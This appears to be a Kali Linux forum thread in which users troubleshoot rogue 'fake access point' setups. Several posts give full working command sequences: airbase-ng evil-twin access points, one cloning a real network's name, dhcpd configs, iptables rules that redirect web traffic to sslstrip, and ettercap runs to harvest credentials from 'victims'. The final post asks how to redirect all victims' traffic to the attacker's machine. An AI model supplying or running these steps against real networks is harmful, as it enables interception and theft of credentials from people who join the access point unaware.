Error: Got channel -1, expected a value > 0.
############################################

...and the dhcpd configurations look like that:

######################################
authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "HOME";
option domain-name-servers 10.0.0.1;

range 10.0.0.30 10.0.0.60;

}
##############################################

Anybody any ideas?

(I'm a total noob..need some clarification please...)

Dtnoks
2014-06-15, 17:38
Noob_4_Life...first you need to learn HOW TO FIX Airodump-ng fixed channel -1 ...

Nick_the_Greek
2014-06-17, 21:07
Hi,
I also want to make a fake access point and got the following problem when I'm going to act on the instructions above:

############################################
root@kali:~# airmon-ng start wlan1 11


Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
2355 NetworkManager
2515 wpa_supplicant
2541 dhclient
3149 dhclient
Process with PID 2541 (dhclient) is running on interface wlan0


Interface Chipset Driver

mon0 Atheros ath5k - [phy0]
wlan0 Atheros ath5k - [phy0]

root@kali:~# airbase-ng -c 11 -e HOME mon0
15:28:41 Created tap interface at0
15:28:41 Trying to set MTU on at0 to 1500
15:28:41 Access Point with BSSID 00:16:44:86:D1:42 started.
Error: Got channel -1, expected a value > 0.
############################################

...and the dhcpd configurations look like that:

######################################
authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "HOME";
option domain-name-servers 10.0.0.1;

range 10.0.0.30 10.0.0.60;

}
##############################################

Anybody any ideas?

(I'm a total noob..need some clarification please...)

As I can see you use a ath5k based wifi card. Since airebase-ng's based faked AP are extremely slow, you can try to create a master mode based fake AP. To do so, you must install the discontinued madwifi-ng drivers, but they are a little buggy and you can harm your KALI installation. If you' re willing to do it, you can try this:

apt-get update
git clone https://github.com/proski/madwifi madwifi-ng
apt-get install -y linux-headers-"`uname -r`"
apt-get install build-essential libssl-dev
# Let's patch it for injection
wget http://patches.aircrack-ng.org/madwifi-ng-r4073.patch
patch -N -p 0 -i madwifi-ng-r4073.patch
# Let's "unload" our current driver
modprobe -r ath5k
modprobe -r ath
echo "blacklist ath9k" >> /etc/modprobe.d/kali-blacklist.conf
echo "blacklist ath5k" >> /etc/modprobe.d/kali-blacklist.conf
echo "blacklist ath" >> /etc/modprobe.d/kali-blacklist.conf
modprobe ath_pci autocreate=none
wlanconfig ath0 create wlandev wifi0 wlanmode ap

and you got a master mode based fake AP! After that you can change your essid, channel etc by:

iwconfig ath0 essid youressid
iwconfig ath0 channel yourchannel

Finally I must note that if you want to go back to ath5k you must unload the ath_pci driver, unblacklist the ath5k,ath9k and ath modules from kali-blacklist.conf and load the ath5k driver again.

TheFedex
2014-08-27, 11:09
Hi everyone, first thing sorry for my bad english but it isn't my first language.
I followed a lot of guide, but I can't realize this fake AP. I followed also the guide of Zimmaro, but without results. I can create the AP and I can connect with the AP (from Windows I get also the message connected to Internet), but when I try to navigate I can't. It seems I can ping a address like 8.8.8.8 (not always in some test it doesn't work) but if I try to ping www.google.com I can't (just in some test it worked). From another client I can't ping anything (just in some test it worked). It seems like if the connection is really slow or instable (I see also the skype icon, in the client connected to the fake AP) that for a few moment is connected but after some seconds it write again "In connection...". Please, somene could give me a help? These are the istructions I use:

my GW is: 192.168.1.254


airmon-ng start wlan0 11
airbase-ng -c 11 -e WIFI_TEST444555 mon0
ifconfig at0 192.168.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.0.1
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.254
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start


sslstrip -f -p -k 10000


ettercap -p -u -T -q -i at0

dhcpd.conf

authoritative;

default-lease-time 600;
max-lease-time 7200;

subnet 192.168.0.0 netmask 255.255.255.0 {
option routers 192.168.0.1;
option subnet-mask 255.255.255.0;

option domain-name "FREE_WIFI444555";
option domain-name-servers 192.168.0.1;


range 192.168.0.30 192.168.0.60;

}

chestor
2014-10-05, 12:07
when im doing like a zimmaro after command
airbase-ng -c 11 -e wifi mon0
it says "Error: Got channel -1, expected value > 0"
end even if i choose another chanel its still says the same
sorry for my english

Nick_the_Greek
2014-10-06, 18:14
when im doing like a zimmaro after command
airbase-ng -c 11 -e wifi mon0
it says "Error: Got channel -1, expected value > 0"
end even if i choose another chanel its still says the same
sorry for my english
Hi there chestor !
You can try my script
Aerial - How to E-Z Setup a Multi-mode wireless LAN Based on a Software Access point (https://forums.kali.org/showthread.php?23028-Aerial-Multi-mode-wireless-LAN-Based-on-a-Software-Access-point )
and select mode 6:

6. MiTM - Transparent SSLstriped WLAN (Sslstrip).
you will be able to setup a transparent sslstriped wireless LAN very easely with airbase-ng or hostapd.
It's almost the same as zimmaro's approach.

testerchat
2014-10-17, 18:18
Hello, I try to set up a fake wifi 2.4Ghz AP, I use the Alfa AWUS036H adapter that is connected to a wifi network ESSID: freewifi. Can I create a fake access point with the same ESSID?(Freewifi) and distribute it to as internet (and that would be my wifi the adapter is connected to this AP, and not reconnected to the I created AP)? can i take a WIFI interface and immediately distribute the Internet? Below I will give you as I try to implement it.

Gateway in the network from which I take the internet : 192.168.2.1
Operating System: kali-linux 1.0.9a-i386

1.Tell me the logic of my example correct?

2.On the Internet I could not find examples of creating a fake AP where to connect to the Internet and to create a fake AP would be used one WiFi interface.

3.Why my card is not connected to a WiFi network and does not receive the settings via dhсp? (Tried and integrated adapter, but the result is the same) write that the Problem may be in the driver... but why can not I connect by the built-in adapter I do not understand...



iw reg set BO
iwconfig wlan1 txpower 30
iwconfig wlan1 essid "freewifi" ap 01:00:00:00:00:00 #connection to AP by ESSID and BSSID
dhclient -v wlan1
apt-get install isc-dhcp-server
nano /etc/dhcpd.conf
######
authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "HOME";
option domain-name-servers 10.0.0.1;

range 10.0.0.30 10.0.0.60;

}
######
airmon-ng start wlan1 11
airbase-ng mon0 -c 7 --essid "freewifi" #creation of FAKE AP with the same ESSID
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.2.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A POSTROUTING -o wlan1 -j MASQUERADE

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start
###### ####
root@hk3r:~# sslstrip -f -p -k 8080
######
root@hk3r:~# ettercap -p -u -T -q -i at0
######

Additional Information:

root@kali:~# iptables -L -n
Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain FORWARD (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

root@kali:~# dhclient -v wlan1
Internet Systems Consortium DHCP Client 4.2.2
Copyright 2004-2011 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Listening on LPF/wlan1/MYADAPTERMAC
Sending on LPF/wlan1/MYADAPTERMAC
Sending on Socket/fallback
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 6
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 11
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 14
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 15
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 8
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 7
No DHCPOFFERS received.
No working leases in persistent database - sleeping.

root@kali:~# tcpdump -i wlan1 port 67 or port 68 -e -n
clear....

I will be very glad to help.

myn
2014-11-22, 07:28
Hi, I've some trouble with dns.
my configuration is:

wlan0 is default network for access to lan and internet
wlan1 is the Alfa wireless network for fakeAP

the ifconfig results is:
eth0 Link encap:Ethernet HWaddr 00:1c:25:95:70:18
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:20 Memory:fc600000-fc620000

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:50 errors:0 dropped:0 overruns:0 frame:0
TX packets:50 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:19773 (19.3 KiB) TX bytes:19773 (19.3 KiB)

wlan0 Link encap:Ethernet HWaddr 00:16:ea:b1:5d:12
inet addr:172.16.1.157 Bcast:172.16.255.255 Mask:255.255.0.0
inet6 addr: fe80::216:eaff:feb1:5d12/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:297 errors:0 dropped:0 overruns:0 frame:0
TX packets:23 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:22659 (22.1 KiB) TX bytes:2453 (2.3 KiB)

wlan1 Link encap:Ethernet HWaddr 00:c0:ca:62:04:a9
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

then route -n is:

Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 172.16.1.254 0.0.0.0 UG 0 0 0 wlan0
172.16.0.0 0.0.0.0 255.255.0.0 U 0 0 0 wlan0

now my command is:

apt-get install dhcp3-server
gedit /etc/dhcpd.conf

authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 172.16.77.0 netmask 255.255.255.0 {
option routers 172.16.77.254;
option subnet-mask 255.255.255.0;
option domain-name "wifiFREE";
option domain-name-servers 172.16.77.254;
range 172.16.77.2 172.16.77.20;
}

airmon-ng
airmon-ng start wlan1
airbase-ng -c 11 -e wifiFREE mon0

ifconfig at0 172.16.77.254 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 172.16.77.0 netmask 255.255.255.0 gw 172.16.77.254
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 172.16.1.254
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start
sslstrip -l 8080

ettercap -p -u -T -q -i at0

then i take my ipad and connect to wifiFREE without any trouble.
ip address are assigned correctly and if from ipad with fing i ping 8.8.8.8 it respond correctly.
but if from ipad safari I try to open google.com or any other website after some seconds when the browser tries unsuccessfully to load the page i can't display websites.
if i try with ip address insted i can view websites.
this is strange because even setting

option domain-name-servers 172.16.77.254, 8.8.8.8;

i have the same situation.

anyone have an idea about solve this strange trouble?
TIA

myn
2014-11-22, 10:16
is it possible due to my network firewall Cisco ASA? It's strange beacause in my granparents network it works finely

quiqueb
2015-02-20, 00:27
hi, i have done every step like you do, buy in the "victim" machine, when i connect to the fake access point it sais that there is no internet acces. I dont know what to do to change that could anyone help me.

Manolo
2015-04-22, 19:36
Hello, Zimmaro

I follow yours steps and I can connect to the fake wifi and get IP via DHCP, but can't navigate to the internet it's appear be a problem with DNS, because the browser was trying and trying...

I do the test with 2 wlan's. wlan0=interface connected on the internet, wlan1=fake (USB)

When I create the fake SSID # airbase-ng -c 11 -e HOME mon0 I get the this output:

16:35:05 Created tap interface at0
16:35:05 Trying to set MTU on at0 to 1500
16:35:05 Trying to set MTU on mon0 to 1800
16:35:05 Access Point with BSSID 38:B1:DB:CD:26:35 started.
Error: Got channel -1, expected a value > 0.


Can you help me?

Thank you!

zimmaro
2015-04-23, 08:02
Hello, Zimmaro

I follow yours steps and I can connect to the fake wifi and get IP via DHCP, but can't navigate to the internet it's appear be a problem with DNS, because the browser was trying and trying...

I do the test with 2 wlan's. wlan0=interface connected on the internet, wlan1=fake (USB)

When I create the fake SSID # airbase-ng -c 11 -e HOME mon0 I get the this output:

16:35:05 Created tap interface at0
16:35:05 Trying to set MTU on at0 to 1500
16:35:05 Trying to set MTU on mon0 to 1800
16:35:05 Access Point with BSSID 38:B1:DB:CD:26:35 started.
Error: Got channel -1, expected a value > 0.


Can you help me?

Thank you!

hi :-)
-for error -1 try to use airmon-zc to put in monitor-mode ""fake-usb-device""
http://postimg.org/image/4e8na9zq7/
-for correct fake_AP ..my procedure is TO OLD (for old kali-version && old victims-browser/update_system) now i'don't have time to RE-TEST it on new kali 1.1.0a ..USE PLUS-GREAT script Aerial.sh by Nick_The_Greek (worked fine && have many options)
bye

Farenheit451
2016-04-29, 16:54
Hi,

I know this thread is a bit old, but I would just like to say this tutorial has worked perfectly for me!

One quick question: I want to modify the IP table rules so that all traffic will be redirected to my machine (so for instance, if they type in google.com they'll be redirected to the IP of my machine 192.168.1.4).

What set of IP table rules should I have in order to achieve this?

Thansk!